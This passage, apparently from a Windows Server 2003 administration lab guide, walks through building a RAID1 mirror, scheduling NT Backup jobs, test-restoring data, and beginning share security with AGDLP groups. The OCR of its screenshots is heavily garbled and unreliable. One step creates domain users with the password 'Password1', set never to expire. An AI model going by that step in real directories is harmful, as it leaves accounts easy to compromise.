< Back | Hext > | Cancel |

5. In the Assign Letter Drive Or Path screen, allow the system to assign the next available
drive letter. Click Next.
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Assign Drive Letter or Path
For easier access, you can assign a dive letter or dive path ta pour volume.

¥ Bission the following dive letter: e =
(" Mount in the fallowing empty NTFS folder:
I Biowse...

Do not assign a dive letter or drive path

< Back I Mext > I Cancel |

6. On the Format Volume screen, format the volume with N'TFS, using the default allocation
unit size. Add the volume label MIRROR and select to perform a quick format. Click Next.

Format Yolume
To store data an this volume. you must farmat it first, z

Choose whether you want to format this volume, and if so, what settings you want to use.

Do not format this volume

& Format this volume with the following settings:

Eile systen: INTFS -
Allocation unit size: IDgfauh -
Wolume |abel IMIF\F\UH

[V Perform a quick format

™ Enable file and folder compression

< Back I Mest > I Cancel

7. Confirm the details of the new volume and click Finish.

Completing the New Yolume
Wizard

‘fou have successfully completed the New Yolume Wizard

‘ou selected the following settings:

Y olume tune; Mimar S
Disks selected: Disk 1. Disk. 2
Yolume size: 2047 MB

Diive letter ar path: E:

File spstem: NTFS

Allocation unit size: Default
Wolume label MIRROR
Quick farmat: “Yes

L«

Ta close this wizard, click Finish.

< Back I Finish I Cancel
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8. In the Disk Management dialog box, you will observe the new volume is formatting
and then resynching.

o |u] ﬂ|
| e
@ Computer (Local [ volume [ Layout [ Type [ File System [ Status | Capaity | Free Space | % Fres | Fault Toler:
=} ﬂ System Tools SIMIRROR (E:) Mirror D... NTFS Resync... 2.00GE 1,99 GE 99 % Ves
-] Event Viewsr SSINRMEWOL_EN (D:) Partition Basic CDFS Healthy — S43ME  OMB 0% Ko
Shared Folders (SDsvs_BOOT(C)  Parkition Basic NTFS Health... 3.99GE 2.47GB  61% o
-2 Local Users and Groups
Perfarmante Logs and ¢
g Device Manager 4 | _’l
{5 storage =
& Remavable Storage “PDisk 0
[ Disk Defragmenier Basic S¥5_BOOT (C:)
S et : 3.99 a8 3.99GB NTFS
o Db gemen Online Healthy (System)
i services and Applications
“Ppisk 1
Dynamic MIRROR (E:)
2,00 68 2,00 GB NTFS
Online: Resynching : (46%)
“Ppisk 2
Dynamic MIRROR (E:)
2.00GB 2,00 GB NTFS
Online: Resyrching : (46%) v
( | o] | Primary partion I Misred vakme ﬂ

9. The new volume is complete when you see that it is healthy. Notice in the upper-right
corner that the new E: drive, MIRROR, is fault-tolerant.

10. In Explorer, you can copy your critical data to the new, fault-tolerant E: drive.

Criteria for Completion

You have completed this task when you have correctly assembled a fault-tolerant RAID1
volume and can copy data to it.

Task 4.6: Backing Up Data

Data loss occurs all the time from many different causes, including hardware failure,
operating-system bugs, application bugs, errors and omissions, and power problems, to
name a few. Disaster-recovery preparation and procedures should be a routine part of every
administrator’s concerns and activities. The ability to recover lost data must exist.

Scenario

You are responsible for the protection of mission-critical information. You need to be
prepared to recover corrupted or lost data files from any day within the last week. You
must establish a backup routine to satisfy these concerns.

Scope of Task

Duration
This task should take 45 minutes.
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Setup

Your critical data is on a file server, but you have no tape drive. You plan to perform the
backups to the local system on a daily basis. You will manually copy those backups to a
remote server over the network to provide for a remote copy.

Caveat

The process of backing up data can consume massive amounts of system and network
resources. The performance of the backup server will degrade substantially during the
backup process. Backups are usually performed overnight while the system and network
resources are at their lowest levels of consumption.

Backups must be tested regularly to confirm their validity and recoverability. Stepping
through the paces of performing the backups may be useless unless you are certain that
your data can be restored. You should be performing test restores on a regular basis.

Procedure

For this task, you will identify the data sets that are mission-critical and perform an initial,
manual backup. This collection of content for backup is referred to as the catalog. You will
then configure this backup to run, overnight, on a daily basis.

Equipment Used

For this task, you must have:

= Windows Server 2003 system

= Administrator or Backup Operator access

= Multiple files and/or folders identified as critical and requiring backup

Details

Assembling the Catalog

1. Log on to the Windows Server 2003 system as the Administrator.

2. Launch Explorer by right-clicking the Start button and selecting Explore.

3. Identify the critical data set requiring backup. Right-click on each of the data folders
and select Properties to determine the approximate size of the backup.

Since you will be backing up to the local drive, be sure you have sufficient
A TE free drive space to record the backup. If you have enough free space,

you will also be backing up the system state data, which will additionally

require approximately 500-600 MB.
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(ol x]
- ; [
File Edit Miew FQVDI’IFES Tools  Help A ﬂﬂ
(JBack » ) - 5 | - search | Folders | C
Address IL:_: —ADaTA General | Shanng| Se:untyl Wb Shanng' Eustumlza'
Folders ) et | [DaTa
B My Documents «| | [C4PPS
B 1 FLE_SRYL [ChDEPL )
—g 3% Flappy () Cysus s Type File Folder
F1 S 5Y5_POOT (C:) oadbet i oy
) A4 @ coreft
) Corfig.Msi BDELTE Size: 104 MB [109,308,710 bytes)
B D pata GPELTE g ondisk: 102 MB (107,227,362 bytes)
El ) apPs & Googl
[ Seriptomatic ﬁW\ndc Cortaires: 35 Files, & Folders
152 Shadow Copy Clients fo "Eﬂwmzl:
[ DEPLOY fPusftp Created: Today. August 31, 2008, 2:07:16 PM
1) 5U5 5P1
g Documents and Settings Atrbutes: 7 Hearkon Advanced
Inetpub
) M50Cache I Hidden
L L ) il x h
11 objects (Disk Free space: 2.31 GBY
oK I Cancel | Lpply |

4. Once you have determined the files and folders to contain in the backup, minimize or
close Explorer.

5. Launch NT Backup by selecting Start » Programs » Accessories » System Tools »
Backup.

6. In the Backup Or Restore Wizard, deselect the Always Start In Wizard Mode check
box, and select the Advanced Mode, underlined in blue to present the Backup Utility
Advanced Mode.

led ] =1aix|

Job  Edit View Tools Help

feicom | Backup I Restore and Manage Medial Schedu\eJDbsI

Welcome to the Backup Utility Advanced Mode

If you prefer, you can switch ko \wizard Mode to uze simplified settings for backup ar restare.

et Backup Wizard [Advanced)

The Backup wizard helps pou create a backup of your programs and files.
sor, Restore Wizard [Advanced]

=N The Restore wizard helps you restore your data from a backup.

d System R v Wizard
The ASR Preparation wizard helps you create a two-part backup of your eysten: a floppy digk that has
your system seftings, and other media that containg a backup of your local system partition.
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On the Backup Utility Advanced Mode screen, select the Backup tab.

197

8. In the Backup Utility, expand the drive where your data set resides. Add content to the
catalog by checking the box to the left of the file(s) and/or folder(s) you want to add to
the catalog.

=l
Job  Edit Wiew Tools Help
‘Welcome  Backup | Restore and Manage Media | Schedule Jobs
Llick ta select the check box for any drive, folder or file that you want to back up.
=] D@' Desktop | | Name | Tupe Sizel
= '§ FILE_SRv1 CAPPS File: Folder
-] % 3% Floppy (4] [ DEPLOY File Falder
B % 5Y5_BOOT () 505 5P File Folder
""" O A4 l AdbeRdiT0_eru_f.. Applcation 20.311KB
@ corefplite 3 exe Application 2.715KB
B DELTEST.EXE Application 300KB
@) DELTEST.HLP Help File E4k.B
& GoogleE arth exe Application 11.541KE
#-[](2) Documents and ! ﬁlWindowsDefender... indows In... 5.628KB
&[] Inetpub 3.@_ winzip30.exe Application 2. 366K
&I MS0Cache 1 wstpi2.ene Application EITKE
----- ) Mew Folder -
‘. - | » «| | |
| Backup destination Backup options:
il i - Mormal backup. Summary log.
IFIle J Some file types excluded.
Backup media or file name:
IA:\Backup.bkf Browse... |
9. Scroll toward the bottom of the left pane and select System State.
hi Only select System State if your system has sufficient free space for the
ING additional 500-600 MB required.

Initializing the Backup

1.

Toward the bottom of the Backup Utility, at the Backup Media Or File Name field,

click Browse. Clear the Insert A Disk message by clicking Cancel.

free space for the backup.

In the Save As dialog box, select your computer name and select a drive with sufficient
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2=
Save jn I@ Desktop j (€] F il | R
DMY Docurments
 FILE_sRYL
‘QMV Metwork Places
File hame: j &I
Save as lype: IBackup Files [*.bkf] j Cancel /l
A

% In our example, the computer name is FILE_SRV1.
TE

Once the correct drive is selected, create a new folder called BACKUP by clicking the
New Folder button in the upper-right corner. It looks like a folder with a sparkle on it.
Name the folder BACKUP and then click the white space beside the new folder to set
the name.

Double-click on the new folder BACKUP. In the File Name field below, enter the
backup filename (something like FS1_DATA_SS.bkf). This stands for the computer
name, FILE_SRV1; DATA to identify that this backup contains a data backup; and SS
to identify that this backup also includes the system state data for FILE_SRV1.

Click Save.
In the Backup dialog box, click Start Backup.

Review the Backup Job Information dialog box. Accept the default information and
click Advanced.

Backup Job Information

Backup description:
ISet created 8/31/2006 at 2268 PM

Schedule.. |

" append this backup to the media, Advanced.. |

If the media already containe backups
’7 " Replace the data on the media with this backup. Cancel |

If the media is ovenaritten, use this label to identify the media:
IFS1_DATA_SS bkf created B/31/2006 at 2:58 PM

™| Zllovs anly the owner and the Administraton acoess bo the
backup data,
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9. Review the settings in the Advanced Backup Options dialog box.

This dialog box is where you would select Verify Data After Backup.

TE Choosing this option will approximately double the time to complete the
backup, and it usually reports errors because some files have changed
since the last time they were backed up. This dialog box is also where you
select the backup type from the drop-down list.

2x|

™ Back up data that is in Fiemate Storage.
™ “erify data after backup.
I I possible, compress the backup data b save space.

W Automatically backup Systemn Protected Files with the Spstern
State.

™| Disatle volume shadow copy.
Backup Type:

INormaI j

Description
Backs up selected filez, and marks each file az backed up.

i Cancel

10. Leave the default settings, and click OK to close the Advanced Backup Options
dialog box.

11. Click Start Backup in the Backup Job Information dialog box. You will be presented
with the Backup Progress dialog box during the backup, and a message will appear
when the backup has completed.

The backup is complete:
To see detailed information, click Report. ﬂl
Drrive: |System State
Labet |F5LDATA,SS.be created 8/31/2006 &t 258
Status: ICompIeled

Elapsed: Estimated remaining:
Tirne: | 8 min., 37 sec. I

Processed: Estimated:
Files | 2655 | 2,655
Bytes: | 581.,709.716 | 551.709.716

12. Click Report to view the report in Notepad.
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—lojx|

Backup Status

loperation: Backup

iactive backup destination: File
Media name: "FS1_pATA_SS. bk created 8/31/2006 at 2:53 Pm"”

Backup (via shadow CDPY) of “C: sys_gooT"”
Backup set #1 on med'la

Backup Type: wNormal

Backup started on 8/31,/2006 at 3:02 PM.
Eackup cnmp]eted on 8/31/2006 at 3:04 PM.
Directories:

Files: 35

Eytes' 109,315,842

Time: 1 minute and 38 seconds

Backup (via shadow copy) of "System state"
Backup set #2 on media #

Backup Type: Copy

Backup started on 8/31/2006 at 3:04 PM.
Backup completed on B/31/2006 at 3:11 PM.
Directories: 165

Files: 2620

Bytes: 442,393,874

Time: & minutes and 59 saconds

Jif

Backup descr"lpt'lom “set created 8/31/2006 at 2:58
Media name: "FsS1_DATA_ss.hkf created 8/31/2006 at 2 58 PM"

Backup dascmpt‘mh "set created 8/31/2006 at 2:58 PM"
Media name: "FS1_pATA_SS. bk created 8/31/2006 at 2:538 Pm"”

13. When you are done reviewing the report, close Notepad.

Setting Up the Scheduled Daily Backup

1.

o g W

In the Backup Utility, on the Backup tab reselect the files and/or folders you wish to

have backed up.

hi Again, be aware of the free disk space required for the backup, and in this
ING case, the multiple backups if you allow this task to run. Only select System
State if your system has sufficient free space for the additional 500-600 MB

required in each backup.

Once you have your catalog selected and the Backup Media Or File Name field defined

correctly, click Start Backup.

In the Backup Job Information dialog box, click Schedule.

You will be prompted to save your selections. Click Yes.

Name your selection script something like FS1_DATA_SS.bks and click Save.

Next you will be prompted to set credentials on the scheduled backup job. The credentials
you supply must have the rights to back up files and folders, such as an Administrator or a
member of the Backup Operators group. Enter the proper credentials; you must enter the

password twice.

Ut Infarrnation

2

Fiun a5 |F|LE,5HV1 A dministrator

Password |.........

Confirm password: I----"“ .

Cancel
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7. In the Scheduled Job Options dialog box, enter a job name and click Properties.

Scheduled Job Options i |

Scheduls data I Backup details |

Jobname: [FS1_DATA_S55_DalLy] Delete

Start Date IThursday, August 31, 2006 at 3:24 PM

Properties...

Cancel

% Feel free to review the Backup Details tab as well.
TE

8. From the Scheduled Task drop-down list, select Daily. In the Start Time field, specify a
time when the server and resources will have the lowest demand. Select Schedule Task
Daily Every 1 Day(s).

Schedule Job 21x|

Schedule I Settings I

% At 3:00 AW every day, starting 8/31/2006

Schedule Task: Start time:

Dy 4| | 3:00 AM =1 Advanced..
Schedule Task Daily

’7 Everp |1| _I:;‘ day(s]

[~ Show multiple schedulss.

Cancel
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% Feel free to review the Advanced settings and the Settings tab as well.
TE

9. Click OK in the Schedule Job dialog box.
10. Click OK in the Schedule Job Options dialog box.
11. To review the scheduled jobs, select the Schedule Jobs tab in the Backup Utility.

il You may want to disable this scheduled job if you do not need this backup
ING to run daily. This job will continue to consume system resources, espe-
cially disk space.

Disabling the Scheduled Daily Backup

1. In the Backup Utility, on the Schedule Jobs tab, click the backup icon on any of the
days that the backup job is scheduled to run on. The cursor turns into the Link Select
icon (a pointing finger by default) as you move over the backup icon. This should open
the Scheduled Job Options dialog box.

Click Properties.

Clear the Enabled (Scheduled Task Runs At Specified Time) check box at the bottom of
this dialog box, and click OK twice.

Schedule Job 21

Task ISchedu\eI Seltlngsl

ﬁ&,‘; CAWINDDWSAT askshFS1_DATA_SS_DAILY. job

Bun: TA_SS_DAILY" A/ VCABACKUPYFST_DATA_S5.bKM
Browse...
Start in: I

Comments:

Fun as: FILE_SRVT\Administrator Set password,

[~ Enabled [scheduled task rune at specified time}

Cancel
Clearing the Enabled (Scheduled Task Runs At Specified Time) check box
TE keeps the details of the scheduled job intact, but does not launch the

scheduled backup job.
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Criteria for Completion

You have completed this task when you have performed a manual backup, reviewed the
backup log, scheduled a daily backup, and disabled the daily backup job.

Task 4.7: Restoring Data from a Backup

Every diligent administrator performs regular backups. An excellent administrator also
performs practice restores from the backups on a regular basis. Unless you restore data
from your backups and verify its integrity, you can never be sure that you can perform
appropriate recovery in a real disaster situation.

Scenario

You are responsible for the protection of mission-critical information. You need to be
prepared to recover corrupted or lost data files from any day within the last week. You
must validate your backup routine by restoring data and verifying its integrity to satisfy
these concerns.

Scope of Task

Duration
This task should take 30 minutes.

Setup

You recently established a daily backup routine and it seems to be running well. You must
validate this by performing a practice restore and then testing the restored data.

Caveat

Practice restores should happen only on offline systems, not in a production environment.
It could be disastrous to restore old data over new data, so always perform practice restores
to a different location.

Consider the confidentiality requirements of the restored data. If a relatively untrusted
administrator is capable of performing these restores, it would be quite easy for them to
access confidential information. Always treat your backup media as highly confidential and
allow only the most trusted administrators the rights and access to perform these restores.

Consider the appropriate security for storage, or the appropriate destruction, for
security purposes, of this restored content.
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Procedure

For this task, you will restore several files from an earlier backup to a different location.
You will then validate the integrity of that restored content by mounting the data with the
appropriate application and determining its readability.

Equipment Used
For this task, you must have:
= Windows Server 2003 system

= Administrator or Backup Operator access

Details

Identifying Content to Restore
1. Log on to the Windows Server 2003 system as the Local Administrator.

2. Launch NT Backup by choosing Start » Programs » Accessories » System Tools »
Backup.

Select the Restore And Manage Media tab.

Expand the folder structure of your earlier backup. Identify and select several files and/
or folders to restore.

ore and Manage Media - ol x|

Edit Wiew Taools Help

Welcnmel Backup Restore and Manage Media | Schedule Jobs I

Expand the desired media itemn, then check the box for the items to restore. Right click on a media item for options:
= []=a Fie Mamne | Size | h
B[] B FE1_DATA_SS bk oreated B/ O S)DaTa 843142006 2
-0 E
- 200 baTa
=0 APPS

----- ) Shadow Copy [
: [ DEPLOY
-3 5Us 5P
“O5 Spstem State

K ja | KT | X

Restore files to: If files alieady exist:

.
Original location j Do nnt replace Start Restore

QOriginal location
location

()
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)’ In the real world, you would select the most critical files to restore. These
AdTE would be the most important files to validate and verify. For practice
purposes, choose files that you are certain are backed up.

2/ Be aware of the amount of data you are restoring to the system and the
ING amount of free space on the disk you will be restoring to.

5. In the Restore Files To drop-down list, select Alternate Location, and then identify a
folder on a drive with sufficient free space to receive the restored content.

=[5

Job  Edit Wew Tools Help

Wwielcome | Backup Restore and Manage Media | Schedule Jobs I

Expand the desired media item, then check. the box for the: items to restore. Right click on a media item for options:

= DQ File Name | Sizel b
=[] & F51_DATA S5 bkf created 8/ Basrrs 0/31 42008 2

O C3DEFLDY 8/31/2006 2

O =sussm 8/31/2008 2

AdbeRdrF0_enu_f... 20,311KB 8/31/2006 2

coreftplite. 3.exe 2.715KB 8/31/2006 Z

DELTEST.EXE 300KE 8431/2006 2

: : DELTEST.HLP B4KE 8/31/2008 2

- L10 5US 571 GoogleE arth.exe 11.541KE 8/31,/2006 2
1A System State - b
WindowsDefender... 5.628KE 843172006 2

winzipd0.exe 2,36BKE 8/31/2008 2

wsltp32 exe E91KE 8/31/2008 2

o | i3] B om

ds. Restore files to: If files already exist:
g i Do not replace
_r IAItemate location j 0 ield ] Start Restore

Liltemate location:

|c.wa
il Do not select the original location to restore the old data to. This would
ING overwrite newer data with old data. Select to restore to a different
location.
)’ In the example, the alternate location selected is the C:\AA folder.
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Initializing the Restore

1. Click Start Restore. You will be presented with the Confirm Restore dialog box. Click
Advanced.

LT
Ta set advanced options for restoring your data, click Advanced.

Ta start restoring your data now, click OK.

Cancel | Advancad.,l

2. The Restore Security check box indicates that, assuming the file system on the target
volume supports it (in other words, if the target volume is formatted with NTFS), the
original NTFS permissions will be reapplied to the restored content.

If this remains enabled, you may not have sufficient permissions to test the
TE content’s validity.

advanced Restore Options 21x]

¥ Restore secuity.

I Restore junction points, and restore file and folder data under
junction paints ta the onginal location.

[T ‘Whern restoring replicated data sets, mark the restored data as
the primany data for &l replicas,

I™ Fiestore the Cluster Begisty o the quorm disk and &l ather
hodes,

¥ Preserve existing volume mount points.

The two other active check boxes indicate that you want to take any selected
folders that were backed up as mount points and restore them as mount points (as
opposed to restoring them as just empty folders), and reconnect the mount points’

underlying content to the mount point. Leave the default configuration intact and
click OK.

3. In the Confirm Restore dialog box, click OK to proceed with the restore. The Restore
Progress dialog box opens, followed by the Restore Is Complete message.
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m _,é} m Cancel I

Dirive: |Q

Label |FS1_DATA_S5 bkf created 8/31/2006 at 258

Status: |Hesto|ing files ko your computer...

Progress: ENENENNNEENENENNENEEE
Elapsed: Estimated remaining:

Time: [ 5sec. | 1 sec.

Frocessing: |CAAMMDATANDELTEST HLP

Processed: Estimated:
Files: | 2 | 3

Bytes: | 372967 | 476,343
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4. Click Report to view the restore report. Notice that it has been appended to the original

backup report. Scroll to the bottom of the report to view the restore statistics.

¢ ac =
Fle Edt Format Wew Help
Time: 1 minute and 38 seconds =]
Backup (via shadow copy) of "System state”
Backup set #2 on media #1
Backup description: "Set created 8/31/2006 at 2:58 PM"
media name: "Fsl_paTa_ss.bkf created 8/31/2006 at 2:58 PM"
Eackup Type: Copy
Backup started on 8/31/2006 at 3:04 PM,
Backup completed on 8/31/2006 at 3:11 PM.
Directories: 165
Files: 2620
ByTas: 442,393,874
Time: 6 minutes and 59 seconds
RESTOrE STATUS
operation: Restore
Backup of "C: SYs_BooT", Restored to"C: SyS_BooThaah"
Backup set #1 on media #1
Backup description: "set created 8/31/2006 at 2:58 PM"
Restore started on 8/31/72006 at 5:34 PM.
restore completed on 8/31/2006 at 5:35 PM.
Directories: 4
Files: 3
Bytes: 477,299
Time: 8 seconds
K| o 4

5. Close Notepad.

Testing the Restored Data
1. Launch Explorer.

2. Expand the left pane sufficiently to view the restored content.
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)’ In this case, the restored content was placed in C:\AA.
e
3. Mount one or more restored files with the appropriate application to validate the
restored file’s integrity.

_ o] x|
File Er ¥ Favorites  Iools  Help | ."r
Q@back ~ ) - (T | ) Search |Fl'f Folders | & X 9 | g
Address IL':‘i CAMDATA j o
Falders x| | Name = Size | Type
B My Documents ;I I 4PPS File Falt
= FILE_SRY1 EAreLTEST ERE 300KE  Applical
2 3% Floppy (A1) ©)DELTEST.HLP 64KB  Help Fil
5l e 5¥5_BOOT (C2) = DELTE IR _oi x|
(L3 Ad File Edit Eookmark Options Help
B0 ata anlenlsl Search | Back | PBrint | Exit | £« I 2 I
[
[ BACKUP Delrina TEST Help Contents
(L3 Config.Msi
() DaTA — Delina TEST

(L3) Dacuments and Settings

2 Inetpub Online help is provided for all dialogs, commands and procedures in j

(2 msocache the Delrina TEST utility. Each help panel displays a brief
[ Program Files explanation of the appropriate topic and provides references to
[L2) RECYCLER. -1 other help panels
; N .
[Type: Help File Date Modified: /312006 2:18 PM Size: 63,9 KB For additional tips and information, click highlighted jump and

pop-up text

For information on one of the topics shown below, click the
appropiate icon.

Menue and i:

When the files are mounted properly, or your restored executables launch
TE properly, you have confirmed the validity of your backup.

4. Close all applications.

Criteria for Completion

You have completed this task when you have successfully restored data from an earlier
backup and then tested the validity of the restored content.

Task 4.8: Securing Shares

File and folder resources on a network are accessed through a special opening in a system
called a share point. These share points are there for good reason, but they are often the
doorway that an attacker uses to violate your system security controls. Share points are
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made possible and managed by the File And Printer Sharing service, otherwise called the
Server service.

Only Administrators, members of any of the Operators groups, and Power Users have
permissions sufficient to create share points, in an attempt to minimize the potential
exposure of vulnerabilities.

Even with this elite and restrictive collection of share-point creators, each share point
should be carefully configured to implement the principle of least privilege. In other words,
grant the barest minimum level of access to only those who need access.

Scenario

You are responsible for providing appropriate security and access to a new share point on a
file server. Users need to be able to read and write content on this share point.

Scope of Task

Duration
This task should take 60 minutes.

Setup

You will create a folder with content to be shared on a file server. Then you will create the
proper chain of users and groups to provide appropriate permissions and restrictions to
the content within the folder. Finally, you will create the actual share point.

Caveat

The addition of any share point should be carefully considered. These are holes in the
security fortress on a system.

Improper creation of share points can result in the loss of confidentiality, integrity,
and/or availability of your information assets and can lead to the compromise of the
entire system. The compromise of one system establishes a foothold in your network for
attackers, allowing them to attack your network from within.

Always implement shares with consideration for the principle of least privilege.

Procedure

For this task, you will establish the content to be shared, build the proper AGDLP chain
(User Accounts get added to Global Groups; Global Groups get added to Domain Local
Groups; Local Groups get granted Permissions) to grant permissions, and then implement
the share point.
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Equipment Used

For this task, you must have:
= Windows Server 2003 system in a domain environment

s Domain Administrator access

This technique can be done with Windows XP Professional, Windows
TE Vista, and Windows Server 2008 as well, but remember that a workstation-
class operating system can support only 10 inbound connections to its

Server service. Servers can support unlimited inbound connections to
their Server service.

Details
Pulling Together the Content to Be Shared

1. Log on to the Windows Server 2003 system as the Administrator.
Launch Explorer by right-clicking the Start button and selecting Explore.

In the left pane, select the root of a drive that has sufficient free space to host the
shared content.

In the right pane, right-click in the white space and select New » Folder.
Name the folder STUFF.

Create or copy content into the STUFF folder.

2 For the purposes of this exercise, this content should not contain anything
ING sensitive.

Building AGDLP: Creating the Users and Groups

1. You must first create the groups and users to assemble the AGDLP chain. Launch
Active Directory Users And Computers (ADUC) by selecting Start » Programs »
Administrative Tools » Active Directory Users And Computers.

If the system you are logged onto is not a domain controller, you may
TE install these tools by running Adminpak.msi, which is located in the
Windows\System32 folder on every server-class system by default.
2. Right-click on the domain name and select New » Organizational Unit.

3. Name the new OU CLIENTS.
4. Right-click on the CLIENTS OU and select New » Group.
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5. Name the new group Clients GG; select Global for Group Scope, and Security for
Group Type. Click OK.

New Object - Group x|

ﬁ Createin:  mobeer.comyiCLIENTS

Group name:
| Clignits &5

Group name (pre-windows Z000):

[ clients &6
Group scope Group bype
" Domain local & Security
" Global " Distribution
" Universal

6. Right-click on the CLIENTS OU and select New » Group.

7. Name the new group Clients DLG; select Domain Local for Group Scope, and Security
for Group Type. Click OK.

New Object - Group 1[

@ Createin:  mobeer,comfCLIENTS

Graup name:

| lignts DL

Group name (pre-wWindows 20003

|c\iants [T
Group scope Group bype
" Domain local ' Security
" Global € Distribution
" Universal

8. Right-click on the CLIENTS OU and select New » User.

9. Type the name Userl in the First Name field. Type Userl in the User Logon Name
field. Click Next.



212 Phase 4 = Secure Storage

New Dbject - User x|

g Create in: mobeer com/CLIENTS

First name: IUSeﬂ Lnitiaks:

Last name: I

Full rme: [Usert

User logon name:

IUseﬂ| I@moheer =] j

User lagon name [pre-windows 2000}
|MDEEEF\\ IUseﬂ

< Back I Next > I Cancel |

10. Type the password Password1 in the Password and Confirm Password fields. Clear
the User Must Change Password At Next Logon check box. Enable the User Cannot
Change Password and the Password Never Expires check boxes. Click Next.

New Object - User x|

g Create in:  mobeer.com/CLIENTS

Password [reeseeess]

LConfirm pazsward: I-uuuu

™ User must change passward at next lagan
¥ User cannot change password
v Password never expires

™ Account is disabled

< Back I Next > I Cancel

11. Click Finish to create Userl.

New Object - User x|

g Create in:  mobeer.com/CLIENTS

When you click Finish, the following object will be created:

Full name: Lserl A
Uzer logon name: User] @maobeer.com

The user cannot change the password
The password never expires.

L]

< Back

Cancel |
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12. Repeat steps 8 through 11 to create User2, User3, and User4.

—éﬂctive Directory Users and Computers =10 ﬂ
<5 Ele Action Yiew ‘Window Help ‘ = |

e Ba@E e ERB 2l vEa

@ Active Directory Users and Computer | CLIENTS 6 objects

-] Saved Queries Name 7 [ Type | pescription |
E‘"I@ 'r_“c'h"alj e Clients DLG Secutity Group ...

-3 EII:\ATS €5 Clients GG Secutity Group ...

< ﬁ Userl User

3 (-:I Camputers Q User2 User

#)-(3] Domain Conkrolers € Lserd u

R[] FereignsecurityPrincipals o ik il

[#-{Z] Hardened Servers Lserd User

[ [ LostandFound
[#-(Z] NTDS Quotas

- Program Data

ECI System

Cl Users

K —— |

Building AGDLP for the Shared Content

1. Now you will add the four users into the Global Group. Double-click the Global
Group named Clients GG. On the Members tab, click Add.

2. Click Advanced.

Select Users, Contacts, Computers, or Groups 2| x|
Select this object type:

|Users,erps, o Other abjects Dbject Types... I

Erom this location:

|rmbsel,com Locations... I

Enter the object names to select (examples]:

[Check Names

Advanced I Cancel

4

3. Click Find Now to display all users and groups in the domain.
4. Select Userl through User4. Then click OK.

To select all four users at once, you can click on User1, then press and hold
TE the Shift button on the keyboard and click on User4.



214 Phase 4 = Secure Storage

Select Users, Contacts, Computers, or Groups ﬂﬂ
Select this object type:
IUsals, Groups. or Other objects Obiject Types.

Erom this lacation:

Imobeer com Locations

Common Hueries I

Name: | starts with = | | LColurnns |
Deseriptior IStalts with j I
™ Disabled accaunts Stop |

™| Wion expiting password

Daye since |3t [ogon: 'I

&

Ok Cancel |

Search results:

Name [RDN] | E-Mail Address | Description | In Falder | ;I
ﬁ IUSR_RID Builtin account f... - mobeer comAUs...
ﬁ I'wiaM_BOBO Builtin account f..  mobeer.com/Us...
ﬁ I'wiAM_RID Builtin account f... - mobeer comAUs...
& Nicole Jennings mobeer.com/Us..
ﬁ ook far linus access mobeer. canmds...

m Service Admins mobeer.com/Us..
% SUPPORT_3. This iz a vendor'...  mobeer. com/s

A

5. Click OK a second time to add these users to the Clients GG.

Select Users, Contacts, Computers, or Groups 2] x|
Select this object lype:
|Uwers,l3|uups, or Dther objects Object Types...
From this location;:

|rmbsa.cun Loeations,..

Erter the object names to select (examples):

User! [User] Gymobeer.coml: User? (User?@maobeer.coml: Check Names
User3 [Userd@mobesr.coml: Userd [UserdBmobeer.com]

0K Cancel
2

6. Click OK to close the Clients GG Properties dialog box.

Now you will add the Clients GG into the Domain Local Group called Clients DLG.
Double-click on the Domain Local Group named Clients DLG. On the Members tab,

click Add.
8. Click Advanced.
9. Click Find Now to display all users and groups in the domain.
10. Select the Clients GG. Then click OK.
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11. Click OK a second time to add the Clients GG to the Clients DLG.

Select Users, Contacts, Computers, or Groups ﬂﬂ

Select this object type:

ILlsers, Groups, or Other objects Object Tppes... |

Fiom thiz location

Imubeer.com Locations... |

Enter the object names to select [examples):
Clients GG LCheck Names

Advanced.. Cancel

2
12. Click OK to close the Clients DLG Properties dialog box.
General  Members I Membaer' Managed Ey' Elb|ect| Securlty|
tembers:
Mame | Active Directary Falder ‘
!ﬂ Clients GG mobeer.com/CLIENTS
Femove: |
oK | Cancel Lpply
You have just assembled AGDL of the AGDLP chain for granting
TE permissions (Users into Clients GG; Clients GG into Clients DLG). Next

you will grant the Clients DLG permissions: both NTFS and share-point
permissions.

13. Launch Explorer by right-clicking the Start button and selecting Explore.
14. In the left pane, select the root of a drive that holds the STUFF folder.

15. In the right pane, right-click on the STUFF folder and select Properties. Select the
Security tab.
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General | Shaing Securty | web Sharing | Customize |
Group or user names;
ﬂ}Adm’mistlatois (MOBEER \Admiristratars)
€7 CREATOR DWNER
€7 SYSTEM
[ Users (MOBEER\Users)
Add Bemove
Permissions for Users Alloy Deny
Full Control m} o =
Modify m} O
Fead & Execute O
List Folder Contents [m]
Read [m]
Wit m] m]
c.lf:.ln ........ m m LI
For special permissions of for advanced settings,
;é:ie;vmiﬂlsmns or for advanced settings Advanced
oK | Cencel ] Anply |
)’ The Security tab is used to set NTFS permissions—that is, permissions
A&TE that control picking the files up off the NTFS volume. Permissions should
always be set following the principle of least privilege.
16. Click Add.
17. Click Advanced.
18. Click Find Now to display all users and groups in the domain.

19.
20.

21.

22.

23.

Select the Clients DLG. Then click OK.

Click OK a second time to add the Clients DLG to the access control list for the
STUFF folder.

With the Clients DLG selected in the upper pane, check the Allow Write Permission
option in the lower pane. This collection of Allow permissions grants the Clients DLG
read and write capabilities at the NTFS level for this folder.

You do not want all users of the domain to be able to read these files, so you must get
rid of the Users group. This group has default permissions inherited from the root of
the drive. On the Security tab of the STUFF Properties dialog box, click Advanced.

On the Permissions tab of the Advanced Security Settings For STUFF dialog box, clear
the Allow Inheritable Permissions check box.
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Advanced Security Settings for STUFF I |
Permissions |Aud\||ng| anerl Effective Ferm\sslunsl

Ta view mare information about special permissions, select a permission enliy, and then dlick Edit

Permission entries

Type | Name | Permission [ Inherited From | &pply Ta |
Allaw Administrators [MOBE...  Full Contral <nat inheriteds This folder anly
Allaw Clients DLG [MOBEE... Read.Wrte &E... <not inherited> This folder, subfolders...
Al Admiristratars (MOBE...  Full Cantral Parent Dbject This folder, subfolders...
Allaw CREATOR OWNER Full Cantral Parent Dbject Subfolders and files anly
Allow SYSTEM Full Control Parent Dbject This folder, subfolders...
Allow Users [MOBEERse... Special Parent Object This folder and sublal...
Allow Users (MOBEERMIse..  Read & Execute Parent Dbject This folder, subfolders.
Add Edit Remave

r Allow inhentable permissions from the parent to propagate to this object and all child objects. Include:;
these with entries explicidy defined here. g

I™ Replace permission entiies on all child abjects with entiies shown here that apply o child abjects

Learm more about access contrl.

’D—KI Cancel | Apply I

24. Clearing this check box immediately prompts you to do one of the following;:
= Copy the inherited permissions to make them explicitly assigned at the STUFF folder
= Remove all permissions
= Cancel this action

25. Select to copy the permissions.

x

